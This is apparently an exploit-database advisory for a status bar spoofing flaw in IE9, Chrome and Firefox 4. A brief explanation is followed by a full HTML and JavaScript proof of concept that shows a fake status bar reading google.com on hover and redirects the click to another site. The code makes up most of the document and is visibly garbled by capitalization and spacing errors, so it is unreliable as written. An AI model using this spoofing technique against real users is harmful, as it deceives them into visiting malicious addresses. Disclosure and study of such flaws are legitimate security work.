Via: XeyeTeam
# [+] Exploit Title: IE & Chrome & Firefox Status Bar Spoofing Vulnerability
# [+] Time: 1742011
# [+] Author: xisigr
# [+] Version: IE9.0 & Chrome all version & Firefox4.0
# [+] Tested On: WIN 7
# [+] CVE: N/
This vulnerability exists in all Google Chrome versions, Firefox 4.0 and IE9.0. There is no fixed status bar in these browsers. the status bar appears only when you place your mouse over a linked control. The URL of this link is displayed in the status bar. The status bar uses this design mode, which may cause some logical errors. An attacker uses a script to simulate a click Control. When the mouse moves to the control, the attacker uses images or text to simulate the status bar module. In this case, the status bar spoofing is achieved. When a user clicks the control link, the redirection address is not the address seen in the status bar, but a malicious Address unknown to the user. This is different from the traditional status bar spoofing. When attackers can use HTML to simulate a fixed module in the browser, spoofing will occur. Thanks to hysia for its discussion on POC optimization and evilcos.
Demo code:
<! DOCTYPE html>
<Html lang = "zh-CN">
<Head>
<Meta content = "text/html; charset = UTF-8" http-equiv = "Content-Type">
<Title> Status Bar Spoofing Vulnerability </title>
<Style>
. Firefox4 {
Background:-moz-linear-gradient (top, # fefefefe, # DDDDDD );
Width: 250px;
Height: 20px;
Border: solid 1px # cccccc;
-Moz-border-radius-topright: 3px;
Font-size: 12px;
Font-family: "";
Color: #333333;
Line-height: 20px;
Padding: 0px 0px 0px 5px;
Position: absolute;
Bottom: 0px; left: 0px;
Display: none;
}
. Chrome {
Background: # DFDFDF;
Width: 250px;
Height: 23px;
-Webkit-border-top-right-radius: 4px;
Font-size: 12px;
Font-family: "";
Color: #333333;
Line-height: 23px;
Padding: 0px 0px 0px 3px;
Position: absolute;
Bottom: 0px; left: 0px;
Display: none;
}
. Ie9 {
Filter: progid: DXImageTransform. Microsoft. gradient (startColorstr = # FFFFFF, endColorstr = # E4E5F0, GradientType = 0 );
Width: 250px;
Height: 20px;
Border: solid 1px #767676;
-Webkit-border-radius: 3px;
-Moz-border-radius: 3px;
Border-radius: 3px;
Box-shadow: 2px 2px 4px # 8E8E8E;
Font-size: 12px;
Font-family: "";
Color: #575757;
Line-height: 20px;
Padding: 0px 0px 0px 5px;
Position: absolute;
Bottom: 4px; left: 4px;
Display: none;
}
. Link {
Color: blue;
Text-decoration: underline;
Cursor: pointer;
}
</Style>
<Script>
Var Sys = {};
Var ua = navigator. userAgent. toLowerCase ();
Var s;
(S = ua. match (/msie ([d.] + )/))? Sys. ie = s [1]:
(S = ua. match (/firefox/([d.] + )/))? Sys. firefox = s [1]:
(S = ua. match (/chrome/([d.] + )/))? Sys. chrome = s [1]:
(S = ua. match (/opera. ([d.] + )/))? Sys. opera = s [1]:
(S = ua. match (/version/([d.] +). * safari /))? Sys. safari = s [1]: 0;
Function setClass (){
If (Sys. ie) document. getElementById ("statusbar"). className = "ie9 ";
If (Sys. firefox) document. getElementById ("statusbar"). className = "firefox4 ";
If (Sys. chrome) document. getElementById ("statusbar"). className = "chrome ";
If (Sys. opera) document. getElementById ("statusbar"). className = "opera ";
If (Sys. safari) document. getElementById ("statusbar"). className = "safari ";
}
Function showBrowser (){
If (Sys. ie) document. write (IE: + Sys. ie );
If (Sys. firefox) document. write (Firefox: + Sys. firefox );
If (Sys. chrome) document. write (Chrome: + Sys. chrome );
If (Sys. opera) document. write (Opera: + Sys. opera );
If (Sys. safari) document. write (Safari: + Sys. safari );
}
Function show (status ){
Document. getElementById ("statusbar"). style. display = status;
}
Function goto (url ){
Location = url;
}
</Script>
</Head>
<Body onload = "setClass ();">
<Div info> Your browser is <script> showBrowser () </script> try a <span class = "link" onMouseover = "show (block ); "onMouseout =" show (none) "onClick =" goto (http://xeyeteam.appspot.com/) "> DEMO </span> </div>
<Div id = "statusbar" class = ""> http://www.google.com... </div>
</Body>
</Html>